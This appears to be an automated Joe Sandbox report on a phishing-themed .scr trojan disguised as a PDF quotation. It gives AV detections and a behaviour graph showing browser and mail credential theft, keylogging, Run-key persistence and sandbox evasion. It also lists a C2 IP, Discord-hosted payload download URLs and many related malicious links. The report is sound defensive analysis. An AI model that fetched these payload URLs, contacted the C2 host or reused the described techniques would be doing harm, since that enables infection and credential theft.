                  System Service Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		Automated Exfiltration1
                  Non-Standard Port                  		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)1
                  Registry Run Keys / Startup Folder                  		12
                  Software Packing                  		NTDS3
                  File and Directory Discovery                  		Distributed Component Object Model231
                  Input Capture                  		Scheduled Transfer2
                  Non-Application Layer Protocol                  		SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script3
                  Masquerading                  		LSA Secrets34
                  System Information Discovery                  		SSH1
                  Clipboard Data                  		Data Transfer Size Limits113
                  Application Layer Protocol                  		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common131
                  Virtualization/Sandbox Evasion                  		Cached Domain Credentials321
                  Security Software Discovery                  		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                  Access Token Manipulation                  		DCSync131
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job122
                  Process Injection                  		Proc Filesystem3
                  Process Discovery                  		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                  Hidden Files and Directories                  		/etc/passwd and /etc/shadow1
                  Application Window Discovery                  		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                  Hidden Users                  		Network Sniffing1
                  System Owner/User Discovery                  		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                  Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture1
                  Remote System Discovery                  		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                  Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging1
                  System Network Configuration Discovery                  		Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1310586 Sample: QUOTATION_SEPT9FIBA00541#U0... Startdate: 19/09/2023 Architecture: WINDOWS Score: 100 62 Multi AV Scanner detection for domain / URL 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 13 other signatures 2->68 8 QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe 4 2->8         started        11 Fhzejfh.exe 2 2->11         started        13 Fhzejfh.exe 2 2->13         started        process3 signatures4 78 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->78 15 AppLaunch.exe 15 4 8->15         started        20 cmd.exe 1 8->20         started        22 dllhost.exe 8->22         started        24 cmd.exe 1 8->24         started        80 Antivirus detection for dropped file 11->80 82 Multi AV Scanner detection for dropped file 11->82 84 Machine Learning detection for dropped file 11->84 process5 dnsIp6 48 162.159.133.233, 443, 49729 CLOUDFLARENETUS United States 15->48 50 cdn.discordapp.com 162.159.135.233, 49728, 80 CLOUDFLARENETUS United States 15->50 42 C:\Users\user\AppData\Local\Temp\donexx.exe, PE32 15->42 dropped 52 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->52 54 Tries to steal Mail credentials (via file / registry access) 15->54 56 Tries to harvest and steal browser information (history, passwords, etc) 15->56 58 Installs a global keyboard hook 15->58 26 donexx.exe 1 4 15->26         started        60 Uses ipconfig to lookup or modify the Windows network settings 20->60 30 conhost.exe 20->30         started        32 ipconfig.exe 1 20->32         started        34 conhost.exe 24->34         started        36 ipconfig.exe 1 24->36         started        file7 signatures8 process9 file10 44 C:\Users\user\AppData\Roaming\Fhzejfh.exe, PE32 26->44 dropped 86 Antivirus detection for dropped file 26->86 88 Multi AV Scanner detection for dropped file 26->88 90 Contains functionality to hide user accounts 26->90 92 Machine Learning detection for dropped file 26->92 38 aspnet_compiler.exe 3 2 26->38         started        signatures11 process12 dnsIp13 46 91.207.102.163, 26167, 49742, 49743 M247GB Romania 38->46 70 Contains functionality to hide user accounts 38->70 72 Contains functionality to inject threads in other processes 38->72 74 Contains functionality to steal Chrome passwords or cookies 38->74 76 3 other signatures 38->76 signatures14

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe45%ReversingLabsByteCode-MSIL.Trojan.Zilla
                  QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe100%AviraTR/AD.GenSteal.vbicf
                  QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe100%Joe Sandbox ML
                  QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe46%VirustotalBrowse

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\Fhzejfh.exe100%AviraTR/AD.MortyStealer.wzwcq
                  C:\Users\user\AppData\Local\Temp\donexx.exe100%AviraTR/AD.MortyStealer.wzwcq
                  C:\Users\user\AppData\Roaming\Fhzejfh.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\donexx.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\donexx.exe29%ReversingLabsByteCode-MSIL.Trojan.Zilla
                  C:\Users\user\AppData\Local\Temp\donexx.exe47%VirustotalBrowse
                  C:\Users\user\AppData\Roaming\Fhzejfh.exe29%ReversingLabsByteCode-MSIL.Trojan.Zilla
                  C:\Users\user\AppData\Roaming\Fhzejfh.exe47%VirustotalBrowse

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://cdn.discordappD0%Avira URL Cloudsafe
                  http://cdn.discordap0%Avira URL Cloudsafe
                  91.207.102.163100%Avira URL Cloudmalware
                  91.207.102.16318%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  cdn.discordapp.com
                  		162.159.135.233
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    91.207.102.163true
                    • 18%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    https://cdn.discordapp.com/attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exefalse
                      		high
                      http://cdn.discordapp.com/attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exefalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://github.com/mgravell/protobuf-netiQUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://stackoverflow.com/q/14436606/23354QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.0000000002771000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000026.00000002.472797955.000000000264D000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://github.com/mgravell/protobuf-netJQUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://stackoverflow.com/q/11564914/23354;QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://stackoverflow.com/q/2152978/23354QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://cdn.discordapp.comAppLaunch.exe, 00000018.00000002.472848743.0000000006ED9000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000018.00000002.472848743.0000000006DE1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000018.00000002.472848743.0000000006EC0000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000018.00000002.472848743.0000000006EB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://cdn.discordappDAppLaunch.exe, 00000018.00000002.472848743.0000000006EC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/mgravell/protobuf-netQUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://cdn.discordapp.comAppLaunch.exe, 00000018.00000002.472848743.0000000006E15000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000018.00000002.472848743.0000000006EC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.com/syohex/java-simple-mine-sweeperC:donexx.exe, 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAppLaunch.exe, 00000018.00000002.472848743.0000000006DE1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000018.00000002.472848743.0000000006EA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/syohex/java-simple-mine-sweeperaspnet_compiler.exefalse
                                              		high
                                              http://cdn.discordapp.com/attachments/1152164172566630421/1153190859320328273/VvhAppLaunch.exe, 00000018.00000002.472848743.0000000006EA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://cdn.discordapAppLaunch.exe, 00000018.00000002.472848743.0000000006EB8000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                91.207.102.163
                                                		unknownRomania
                                                		9009M247GBtrue
                                                162.159.135.233
                                                		cdn.discordapp.comUnited States
                                                		13335CLOUDFLARENETUSfalse
                                                162.159.133.233
                                                		unknownUnited States
                                                		13335CLOUDFLARENETUSfalse

                                                General Information

                                                Joe Sandbox Version:38.0.0 Beryl
                                                Analysis ID:1310586
                                                Start date and time:2023-09-19 09:20:08 +02:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 8m 5s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:39
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample file name:QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                                                Original Sample Name:QUOTATION_SEPT9FIBA00541PDF.scr.exe
                                                Detection:MAL
                                                Classification:mal100.phis.troj.spyw.evad.winEXE@20/4@2/3
                                                EGA Information:
                                                • Successful, ratio: 33.3%
                                                HDC Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 96%
                                                • Number of executed functions: 427
                                                • Number of non-executed functions: 111
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                • Excluded domains from analysis (whitelisted): www.bing.com, kv601.prod.do.dsp.mp.microsoft.com, geover.prod.do.dsp.mp.microsoft.com, client.wns.windows.com, fs.microsoft.com, geo.prod.do.dsp.mp.microsoft.com, tse1.mm.bing.net, displaycatalog.mp.microsoft.com, arc.msn.com
                                                • Execution Graph export aborted for target Fhzejfh.exe, PID 5620 because it is empty
                                                • Execution Graph export aborted for target Fhzejfh.exe, PID 5712 because it is empty
                                                • Execution Graph export aborted for target QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, PID 6840 because it is empty
                                                • Execution Graph export aborted for target donexx.exe, PID 6436 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                09:21:32API Interceptor13x Sleep call for process: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe modified
                                                09:21:36API Interceptor1x Sleep call for process: dllhost.exe modified
                                                09:21:49API Interceptor137772x Sleep call for process: AppLaunch.exe modified
                                                09:22:23API Interceptor13x Sleep call for process: donexx.exe modified
                                                09:22:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Fhzejfh C:\Users\user\AppData\Roaming\Fhzejfh.exe
                                                09:22:44AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Fhzejfh C:\Users\user\AppData\Roaming\Fhzejfh.exe

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                91.207.102.163QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, AveMariaBrowse
                                                  VYFNrHpCB0.rtfGet hashmaliciousAveMariaBrowse
                                                    SecuriteInfo.com.Win32.PWSX-gen.3506.1371.exeGet hashmaliciousAveMariaBrowse
                                                      uU9tjq9RDr.exeGet hashmaliciousAveMariaBrowse
                                                        RSEVaE5mcO.rtfGet hashmaliciousAveMariaBrowse
                                                          EuXFn7JecK.exeGet hashmaliciousAveMariaBrowse
                                                            ORDER_PDF.scr.exeGet hashmaliciousAveMariaBrowse
                                                              ORDER_PDF.scr.exeGet hashmaliciousAveMariaBrowse
                                                                ORDER_PDF.scr.exeGet hashmaliciousAveMariaBrowse
                                                                  Quote_JUN75698-LD8972390#U00b7PDF.scr.exeGet hashmaliciousAveMariaBrowse
                                                                    Quote_Order_Parts_&_Drawings#U00b7PDF.scr.exeGet hashmaliciousAveMariaBrowse
                                                                      Quote_JUN75698-LD8972390#U00b7PDF.scr.exeGet hashmaliciousAveMariaBrowse
                                                                        Xgiuavbtyq.exeGet hashmaliciousUnknownBrowse
                                                                          162.159.135.233We7WnoqeXe.exeGet hashmaliciousAmadey RedLineBrowse
                                                                          • cdn.discordapp.com/attachments/878034206570209333/908097655173947432/slhost.exe
                                                                          mosoxxxHack.exeGet hashmaliciousAmadey RedLineBrowse
                                                                          • cdn.discordapp.com/attachments/710557342755848243/876828681815871488/clp.exe
                                                                          Sales-contract-deaho-180521-poweruae.docGet hashmaliciousUnknownBrowse
                                                                          • cdn.discordapp.com/attachments/843685789120331799/844316591284944986/poiu.exe
                                                                          PURCHASE ORDER E3007921.EXEGet hashmaliciousSnake KeyloggerBrowse
                                                                          • cdn.discordapp.com/attachments/809311531652087809/839820005927550996/Youngest_Snake.exe
                                                                          Waybill Document 22700456.exeGet hashmaliciousNanocoreBrowse
                                                                          • cdn.discordapp.com/attachments/809311531652087809/839856358152208434/May_Blessing.exe
                                                                          COMPANY REQUIREMENT.docGet hashmaliciousSnake KeyloggerBrowse
                                                                          • cdn.discordapp.com/attachments/819674896988242004/819677189900861500/harcout.exe
                                                                          Email data form.docGet hashmaliciousAgentTeslaBrowse
                                                                          • cdn.discordapp.com/attachments/789279517516365865/789279697203757066/angelx.scr
                                                                          Down Payment.docGet hashmaliciousMassLogger RATBrowse
                                                                          • cdn.discordapp.com/attachments/788946375533789214/788947376849027092/atlasx.scr
                                                                          Vessel details.docGet hashmaliciousMassLogger RATBrowse
                                                                          • cdn.discordapp.com/attachments/780175015496777751/781048233136226304/mocux.exe
                                                                          Teklif Rusya 24 09 2020.docGet hashmaliciousFormBookBrowse
                                                                          • cdn.discordapp.com/attachments/733818080668680222/758418625429372978/p2.jpg

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          cdn.discordapp.comfile.exeGet hashmaliciousAmadey, Fabookie, Mystic Stealer, RedLine, SmokeLoaderBrowse
                                                                          • 162.159.135.233
                                                                          TR23-USD-33_Incoice_of_MV_ADAMOON.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 162.159.130.233
                                                                          sd3nCNrXhl.exeGet hashmaliciousFabookie, Glupteba, SmokeLoaderBrowse
                                                                          • 162.159.135.233
                                                                          Eozcmq.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 162.159.135.233
                                                                          QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, AveMariaBrowse
                                                                          • 162.159.130.233
                                                                          Ldswaby.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 162.159.134.233
                                                                          LrOq2OzIbC.exeGet hashmaliciousFabookie, Glupteba, SmokeLoaderBrowse
                                                                          • 162.159.130.233
                                                                          9hzxje3AvY.exeGet hashmaliciousFabookie, Glupteba, SmokeLoaderBrowse
                                                                          • 162.159.134.233
                                                                          file.exeGet hashmaliciousClipboard Hijacker, RedLineBrowse
                                                                          • 162.159.130.233
                                                                          854F1E97-5DBB-4AA87-A566-33D9012B095E2pdf.exeGet hashmaliciousUnknownBrowse
                                                                          • 162.159.129.233
                                                                          854F1E97-5DBB-4AA87-A566-33D9012B095E2pdf.exeGet hashmaliciousUnknownBrowse
                                                                          • 162.159.130.233
                                                                          Chemco_PO_2056598.docGet hashmaliciousUnknownBrowse
                                                                          • 162.159.135.233
                                                                          Rzkomf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 162.159.135.233
                                                                          https://cdn.discordapp.com/attachments/1149416411790327819/1149416836249690214/Hotel_Extra_Information.zipGet hashmaliciousUnknownBrowse
                                                                          • 162.159.134.233
                                                                          Vgtrnwhgbt.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 162.159.130.233
                                                                          854F1E97-5DBB-4AD7-A566-43D9012B05E23_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 162.159.130.233
                                                                          yJO4Ve1Pz9.exeGet hashmaliciousAmadey, RedLine, SmokeLoaderBrowse
                                                                          • 162.159.134.233
                                                                          https://cdn.discordapp.com/attachments/1149416411790327819/1149416836249690214/Hotel_Extra_Information.zipGet hashmaliciousUnknownBrowse
                                                                          • 162.159.135.233
                                                                          OmHTbE7gx5.exeGet hashmaliciousAmadey, RedLine, SmokeLoaderBrowse
                                                                          • 162.159.133.233
                                                                          file.exeGet hashmaliciousGluptebaBrowse
                                                                          • 162.159.135.233

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          CLOUDFLARENETUSOFFIZIELLE GEWINNMELDUNG.docxGet hashmaliciousUnknownBrowse
                                                                          • 104.18.131.236
                                                                          https://e9d02e.fxxplrs.nl/speede.gonzales@fast.fmGet hashmaliciousUnknownBrowse
                                                                          • 104.21.33.59
                                                                          E-DEKONT1,DOC.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                                                          • 162.159.135.232
                                                                          OFFIZIELLE GEWINNMELDUNG.docxGet hashmaliciousUnknownBrowse
                                                                          • 104.17.24.14
                                                                          file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                          • 172.67.171.76
                                                                          https://pub-37b3aa0e23aa4c0b89a62d092ce2aa07.r2.dev/link-2%2021.22.35.html#ZHlsYW4uZ2lic29uQHZpYXRlay5jb20uYXU=Get hashmaliciousHTMLPhisherBrowse
                                                                          • 104.16.123.96
                                                                          file.exeGet hashmaliciousClipboard Hijacker, Djvu, Fabookie, Glupteba, RedLine, SmokeLoaderBrowse
                                                                          • 172.67.181.144
                                                                          https://www.bing.com/ck/a?!&&p=783f1e01b3717b07JmltdHM9MTY5NDM5MDQwMCZpZ3VpZD0xMjJiMDRkNi1kNDk3LTYwODUtMjk2My0xN2UzZDU4YTYxZDQmaW5zaWQ9NTEyNA&ptn=3&hsh=3&fclid=122b04d6-d497-6085-2963-17e3d58a61d4&u=a1aHR0cHM6Ly93d3cubGhhYWYub3JnL2x1Y2FoaWxs&ntb#YTJocVlXNW5RR2hrWld3dVkyOHVhM0k9Get hashmaliciousUnknownBrowse
                                                                          • 104.21.18.20
                                                                          rSkeledes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 172.67.205.11
                                                                          file.exeGet hashmaliciousDjvu, Fabookie, Glupteba, RedLine, SmokeLoaderBrowse
                                                                          • 172.67.181.144
                                                                          https://seroca.com/Get hashmaliciousUnknownBrowse
                                                                          • 162.159.135.42
                                                                          Re-Authentication Expiring - 2FA Policy Today From At - Monday-September-2023 18_19 PM.emlGet hashmaliciousHTMLPhisherBrowse
                                                                          • 104.17.25.14
                                                                          https://iongterm-offer.lovely-bright.bond/676f/amazing-2bd-2ba-christchurch-central-city-christchurch-8013/eb8886Get hashmaliciousHTMLPhisherBrowse
                                                                          • 104.18.22.52
                                                                          EkikxfvyTk.exeGet hashmaliciousMars Stealer, VidarBrowse
                                                                          • 104.26.11.89
                                                                          https://beedpakes-usps.comGet hashmaliciousUnknownBrowse
                                                                          • 172.64.141.25
                                                                          https://www.bing.com/ck/a?!&&p=783f1e01b3717b07JmltdHM9MTY5NDM5MDQwMCZpZ3VpZD0xMjJiMDRkNi1kNDk3LTYwODUtMjk2My0xN2UzZDU4YTYxZDQmaW5zaWQ9NTEyNA&ptn=3&hsh=3&fclid=122b04d6-d497-6085-2963-17e3d58a61d4&u=a1aHR0cHM6Ly93d3cubGhhYWYub3JnL2x1Y2FoaWxs&ntb#YTJocVlXNW5RR2hrWld3dVkyOHVhM0k9Get hashmaliciousUnknownBrowse
                                                                          • 104.21.18.20
                                                                          https://www.payment.token2049.com/page/3156941?widget=true&Get hashmaliciousUnknownBrowse
                                                                          • 104.22.55.104
                                                                          file.exeGet hashmaliciousDjvu, Fabookie, Glupteba, RedLine, SmokeLoaderBrowse
                                                                          • 172.67.181.144
                                                                          file.exeGet hashmaliciousDjvu, Fabookie, Glupteba, RedLine, SmokeLoaderBrowse
                                                                          • 172.67.181.144
                                                                          Bank.Account_Details.shtmlGet hashmaliciousHTMLPhisherBrowse
                                                                          • 104.17.25.14
                                                                          CLOUDFLARENETUSOFFIZIELLE GEWINNMELDUNG.docxGet hashmaliciousUnknownBrowse
                                                                          • 104.18.131.236
                                                                          https://e9d02e.fxxplrs.nl/speede.gonzales@fast.fmGet hashmaliciousUnknownBrowse
                                                                          • 104.21.33.59
                                                                          E-DEKONT1,DOC.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                                                          • 162.159.135.232
                                                                          OFFIZIELLE GEWINNMELDUNG.docxGet hashmaliciousUnknownBrowse
                                                                          • 104.17.24.14
                                                                          file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                          • 172.67.171.76
                                                                          https://pub-37b3aa0e23aa4c0b89a62d092ce2aa07.r2.dev/link-2%2021.22.35.html#ZHlsYW4uZ2lic29uQHZpYXRlay5jb20uYXU=Get hashmaliciousHTMLPhisherBrowse
                                                                          • 104.16.123.96
                                                                          file.exeGet hashmaliciousClipboard Hijacker, Djvu, Fabookie, Glupteba, RedLine, SmokeLoaderBrowse
                                                                          • 172.67.181.144
